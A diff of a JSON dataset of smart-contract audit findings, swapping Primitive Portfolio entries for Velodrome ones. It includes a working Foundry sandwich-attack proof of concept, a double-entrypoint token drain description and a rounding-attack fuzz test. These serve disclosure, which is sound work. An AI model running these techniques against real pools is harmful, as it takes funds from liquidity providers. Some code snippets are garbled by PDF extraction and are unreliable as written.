"title": "Liquidity can be (de-)allocated at a bad price", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "To allocate liquidity to a pool, a single uint128 liquidityDelta parameter is specified. The re- quired deltaAsset and deltaQuote token amounts are computed from the current virtualX and virtualY token reserves per liquidity (prices). An MEV searcher can sandwich the allocation transaction with swaps that move the price in an unfavorable way, such that, the allocation happens at a time when the virtualX and virtualY variables are heavily skewed. The MEV searcher makes a profit and the liquidity provider will automatically be forced to use undesired token amounts. In the provided test case, the MEV searcher makes a profit of 2.12e18 X and the LP uses 9.08e18 X / 1.08 Y instead of the expected 3.08 X / 30.85 Y. LPs will incur a loss, especially if the asset (X) is currently far more valuable than the quote (Y). // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), 14 poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1. MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %y \\t %s\", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( \"victim used asset/quote for allocate: %s \\t %y \\t %s\", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3. MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors ,! amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); ,! vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( \"MEV asset/quote profit: %s \\t %s\", mev_asset_balance - initialBalance, mev_quote_balance - ,! initialBalance ); } 15 }", + "title": "Wrong proposal expected value in VeloGovernor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The expected values of MAX_PROPOSAL_NUMERATOR and proposalNumerator are incorrect, in the current implementation max proposal is set to 0.5%, the expected value is 5%, and the proposal numerator starts at 0.02%, and not at 0.2% as expected.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Missing signextend when dealing with non-full word signed integers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The AssemblyLib is using non-full word signed integers operations. If the signed data in the stack have not been signextend the twos complement arithmetic will not work properly, most probably reverting. The solidity compiler does this cleanup but this cleanup is not guaranteed to be done while using the inline assem- bly.", + "title": "_burn function will always revert if the caller is the approved spender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The owner or the approved spender is allowed to trigger the _burn function. However, whenever an approved spender triggers this function, it will always revert. This is because the _removeTokenFrom function will revert internally if the caller is not the owner of the NFT as shown below. function _removeTokenFrom(address _from, uint256 _tokenId) internal { // Throws if `_from` is not the current owner assert(idToOwner[_tokenId] == _from); As a result, an approved spender will not be able to withdraw or merge a veNFT on behalf of the owner because the internal _burn function will always revert.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulat- ing the same underlying storage (such as Synthetix tokens like SNX and sBTC and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple entrypoint tokens are not safe to be used in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double entrypoint token, crediting the attacker and transferring them the entire balance of the double entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double entrypoint tokens will cancel out.", + "title": "OpenZeppelin's Clones library can be used to cheaply deploy rewards contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin's Clones library allows for significant gas savings when there are multiple deploy- ments of the same family of contracts. This would prove useful in several factory contracts which commonly deploy the same type of contract. Minimal proxies make use of the same code even when initialization data may be different for each instance. By pointing to an implementation contract, we can delegate all calls to a fixed address and minimise deployment costs.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Swap amounts are always estimated with priority fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually less than the normal fee, the input amount will be underestimated for non-controllers and the input amount will be too low and the swap reverts.", + "title": "VelodromeTimeLibrary functions can be made unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Running the following fuzz test pragma solidity 0.8.13; import \"forge-std/Test.sol\"; contract VelodromeTimeLibrary { uint256 public constant WEEK = 7 days; /// @dev Returns start of epoch based on current timestamp function epochStart(uint256 timestamp) public pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } /// @dev Returns unrestricted voting window function epochEnd(uint256 timestamp) public pure returns (uint256) { unchecked { 40 return timestamp - (timestamp % WEEK) + WEEK - 1 hours; } } } contract VelodromeTimeLibraryTest is Test { VelodromeTimeLibrary vtl; uint256 public constant WEEK = 7 days; function setUp() public { vtl = new VelodromeTimeLibrary(); } function testEpochStart(uint256 timestamp) public { uint256 uncheckedVal = uint256 normalVal = timestamp - (timestamp % WEEK); assertEq(uncheckedVal, normalVal); vtl.epochStart(timestamp); } function testEpochEnd(uint256 timestamp) public { uint256 uncheckedVal = vtl.epochEnd(timestamp); uint256 normalVal = timestamp - (timestamp % WEEK) + WEEK - 1 hours; assertEq(uncheckedVal, normalVal); } } One can see that both VelodromeTimeLibrary functions will only start to overflow at a ridiculously high timestamp input.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Rounding functions are wrong for negative integers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. The scaleFromWadDownSigned only performs a truncations, rounding negative integers towards zero. This function is used in checkInvariant to ensure the new invariant is not less than the new invariant in a swap: int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote); int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned( pools[poolId].pair.decimalsQuote ); nextInvariantWad >= liveInvariantWad It can happen for quote tokens with fewer decimals, for example, 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero. And nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units.", + "title": "Skip call can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "distribute(address[] memory _gauges) is meant to be used for multiple gauges but it calls minter.update_period before each call to notifyRewardAmount", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "LPs can lose fees if fee growth accumulator overflows their checkpoint", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Fees (that are not reinvested in the pool) are currently tracked through an accumulator value pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the users checkpoint is computed and multiplied by their liquidity. The accumu- lator values are deliberately allowed to overflow as only the distance matters. However, if an LP does not sync its fees and the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example: User allocates at pool.feeGrowthGlobalAsset = 1000e36 pool.feeGrowthGlobalAsset grows and overflows to 0. differenceAsset is still accurate. pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again. differenceAsset will be zero. If the user only claims their fees now, theyll earn 0 fees.", + "title": "Change to zero assignment to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is not necessary to subtract the total value from the votes instead you should set it directly to zero.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Unnecessary left shift in encodePoolId", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The encodePoolId performs a left shift of 0. This is a noop.", + "title": "Refactor to skip an SLOAD", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is possible to skip an SLOAD by refactoring the code as it is in recommendation.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "_syncPool performs unnecessary pool state updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _syncPool function is only called during a swap. During a swap the liquidity never changes and the pools last timestamp has already been updated in _beforeSwapEffects.", + "title": "Tail variable can be removed to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is possible to save gas by freeing the tail slot, which can be replaced by check weekly < TAIL_- START", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Portfolio.sol gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the contract weve identified a number of minor gas optimizations that can be performed. Weve gathered them into one issue to keep the issue number as small as possible. L750 The msg.value > 0 check is done also in the __wrapEther__ call L262 The following substitutions can be optimized in case assets are 0 by moving each instruction within the ifs on lines 256-266 pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); pos.tokensOwedQuote -= claimedQuotes.safeCastTo128(); L376 Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId] L444:L445 The following two instructions can be grouped into one. output = args.output; output = output.scaleToWad(... L436:L443 The internalBalance variable can be discarded due to the fact that it is used only within the input assignment. uint256 internalBalance = getBalance( msg.sender, _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote ); input = args.useMax == 1 ? internalBalance : args.input; input = input.scaleToWad( _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote ); L808 Assuming that the swap instruction will be one of the most used instructions, might be worth moving it as first if condition to save gas. L409 The if (args.input == 0) revert ZeroInput(); can be removed as it will result in iteration.input being zero and reverting on L457.", + "title": "Use a bitmap to store nudge proposals for each epoch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The usage of a bitmap implementation for boolean values can save a significant amount of gas. The proposals variable can be indexed by each epoch which should only increment once per week.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Incomplete NatSpec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the IPortofolio.sol interface, various NatSpec comments are missing or incomplete", + "title": "isApproved function optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because settings are all known, you could do an if-check in memory rather than in storage, by validating first the fallback settings. The recommended implementation will become cheaper for the base case, negligibly more expensive in other cases ~10s of gas", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Inaccurate Comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "These comments are inaccurate. [1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two byte offset from the start of the array (in L94, only in the endpoint of the slice).", + "title": "Use calldata instead of memory to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Using calldata avoids copying the value into memory, reducing gas cost", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Check for priorityFee should have its own custom error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The check for invalid priorityFee within the checkParameters function uses the same custom error as the one for fee. This could lead to confusion in the error output.", + "title": "Cache store variables when used multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Storage loads are very expensive compared to memory loads, storage values that are read multiple times should be cached avoiding multiple storage loads. In SinkManager contract use multiple times the storage variable ownedTokenId", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Unclear @dev comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "This comment is misleading. It implies that cache is used to \"check\" state while it in fact changes it.", + "title": "Add immutable to variable that don't change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Using immutable for variables that do not changes helps to save on gas used. The reason has been that immutable variables do not occupy a storage slot when compiled, they are saved inside the contract byte code.", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Unused custom error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Unused error error AlreadySettled();", + "title": "Use Custom Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "As one can see here: \"there is a convenient and gas-efficient way to explain to users why an operation failed through the use of custom errors. Until now, you could already use strings to give more information about failures (e.g., revert(\"Insufficient funds.\");), but they are rather expensive, especially when it comes to deploy cost, and it is difficult to use dynamic information in them.\"", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "Use named constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_- ASSET constant. sellAsset := eq(6, and(0x0F, byte(0, value)))", + "title": "Cache array length outside of loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If not cached, the solidity compiler will always read the length of the array during each iteration. That is, if it is a storage array, this is an extra sload operation (100 additional extra gas for each iteration except for the first) and if it is a memory array, this is an extra mload operation (3 additional gas for each iteration except for the first).", "labels": [ "Spearbit", - "Primitive", - "Severity: Informational" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "scaleFromWadUp and scaleFromWadUpSigned can underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0 because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1", + "title": "Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to (block.timestamp + MAXTIME / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "AssemblyLib.pack does not clear lowers upper bits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value.", + "title": "veNFT split functionality can not be disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Once split functionality has been enabled via the enableSplitForAll(), it is not possible to disable this feature in the future. It does not pose any additional risk to have it disabled once users have already split their veNFTs because the protocol allows for these locked amounts to be readily withdrawn upon expiry.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "AssemblyLib.toBytes8/16 functions assumes a max raw length of 16", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The toBytes16 function only works if the length of the bytes raw parameter is at most 16 because of the unchcked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function.", + "title": "Anyone can notify the FeesVotingReward contract of new rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "While the BribeVotingReward contract intends to allow bribes from anyone, the FeesVotingReward contract is designed to receive fees from just the Gauge contract. This is inconsistent with other reward contracts like LockedManagedReward.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "PortfolioLib.maturity returns wrong value for perpertual pools", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A pool can be a perpetual pool that is modeled as a pool with a time to maturity always set to 1 year in the computeTau. However, the maturity function does not return this same maturity. This currently isnt a problem as maturity is only called from computeTau in case it is not a perpetual pool.", + "title": "Missing check in merge if the _to NFT has voted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The merge() function is used to combine a _from VeNFT into a _to veNFT. It starts with a check on if the _from VeNFT has voted or not. However, it doesn't check if the _to VeNFT has voted or not. This will cause the user to have less voting power, leaving rewards and/or emissions on the table, if they don't call poke() || reset(). Although this would only be an issue for an unaware user. An aware user would still have to waste gas on either of the following: 1. An extra call to poke() || reset(). 2. Vote with the _to veNFT and then call merge().", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "_createPool has incomplete NatSpec and event args", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function can be improved by adding more arguments.", + "title": "Ratio of invariant _k to totalSupply of the AMM pool may temporarily decrease", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The burn function directly sends the reserve pro-rated to the liquidity token. This is a simple and elegant way. Nevertheless, two special features of the current AMM would lead to a weird situation. 1. The fee of the AMM pool is sent to the fee contract instead of being absorbed into the pool; 2. The stable pool's curve x3y + y3x have a larger rounding error compare to uni-v2's constant product formula. The invariant K in a stable pool can decrease temporarily when a user performs certain actions like minting a token, doing a swap, and withdrawing liquidity. This means that the ratio of K to the total supply of the pool is not monotonously increasing. In most cases, this temporary decrease is negligible and the ratio of K to the total supply of the pool will eventually increase again. However, the ratio of K to the total supply is an important metric for calculating the value of LP tokens, which are used in many protocols. If these protocols are not aware of the temporary decrease in the K value, they may suffer from serious issues (e.g. overflow). The root cause of this issue is: there are always rounding errors when using \"balance\" to calculate invariant k. Sometimes, the rounding error is larger. if an lp is minted when the rounding error is small (ratio of amount: k is small) and withdrawn when the rounding error is large (ratio of amount: k is large). The total invariant decreased. We can find a counter-example where the invariant decrease. function testRoundingErrorAttack(uint swapAmount) public { // The counter-example: swapAmount = 52800410888861351333 vm.assume(swapAmount < 100_000_000 ether); vm.assume(swapAmount > 10 ether); uint reserveA = 10 ether; uint reserveB = 10 ether; uint initialK = _k(reserveA, reserveB); reserveA *= 2; reserveB *= 2; uint tempK = _k(reserveA, reserveB); reserveB -= _getAmountOut(swapAmount, token0, reserveA, reserveB); reserveA += swapAmount; vm.assume(tempK <= _k(reserveA, reserveB)); reserveA -= reserveA / 2; reserveB -= reserveB / 2; require(_k(reserveA, reserveB) > } initialK, \"Rounding error attack!\"); 47", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "_liquidityPolicy is cast to a uint8 but it should be a uint16", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "During _createPool the pool curve parameters are set. One of them is the jit parameter which is a uint16. It can be assigned the default value of _liquidityPolicy but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max a wrong jit value will be assigned.", + "title": "Inconsistent check for adding value to a lock", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "depositFor allows anyone to add value to an existing lock However increaseAmount, which for NORMAL locks is idempotent, has a check to only allow an approved or Owner to increase the amount.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Update _feeSavingEffects documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _feeSavingEffects documentation states: @return bool True if the fees were saved in positions owed tokens instead of re-invested.", + "title": "Privileged actors are incentivized to front-run each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Privileged actors are incentivized to front-run each other and vote at the last second, because of the FIFS OP sequencer, managers will try to vote exactly at the penultimate block in order to maximize their options (voting can only be done once)", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Document checkInvariant and resolve confusing naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The checkInvariant functions return values are undocumented and the used variables names are confusing.", + "title": "First nudge propose must happen one epoch before tail is set to true", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because you can only propose a nudge one epoch in advance, the first propose call will need to happen on the last epoch in which tail is set to false While the transaction simulation will fail for execute, the EpochGovernor.propose math will make it so that the first proposal will have to be initiated an epoch before in order for it to be executable on the first tail epoch", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Token amounts are in wrong decimals if useMax parameter is used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract. This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount to be used which will lead to user loss as the tokens remain in the contract after the action.", + "title": "Missing emit important events", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The contracts that change or create sensible information should emit an event.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut underestimates outputs leading to losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When computing the output, the getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example) and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., it leads to a larger output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses. Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108. The core issue is that invariant is not strictly monotonic, invariant(R_x, R_y) = invariant(R_x + 2_852_- 050_358, R_y), there are many neighbouring roots for the pool configuration: function test_eval() public { uint128 R_y = 56075575; uint128 R_x = 477959654248878758; uint128 stk = 117322822; uint128 vol = 406600000000000000; uint128 tau = 2332800; int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); // this is the actual dependent that still satisfies the invariant R_x -= 2_852_050_358; int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); 25 console2.log(\"prev: %s\", prev); console2.log(\"post: %s\", post); assertEq(post, prev); assertEq(post, 0); }", + "title": "Marginal rounding errors when using small values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It may be helpful to encourage end users to use BPS or higher denominations for weights when dealing with multiple gauges to keep precision high. Due to widespread usage of the _vote function throughout the codebase and in forks, it may be best to suggest this in documentation to avoid reverts", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The swap function enforces that the pool's invariant value does not decrease; however, the getA- mountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero--which will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the func- tion (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3] instead of the difference between the evaluated and original invariant. As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero.", + "title": "Prefer to use nonReentrant on external functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "it may be best to use nonReentrant on the external functions rather than the internal ones. Vote, for example, is not protected because the internal function is.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly.", + 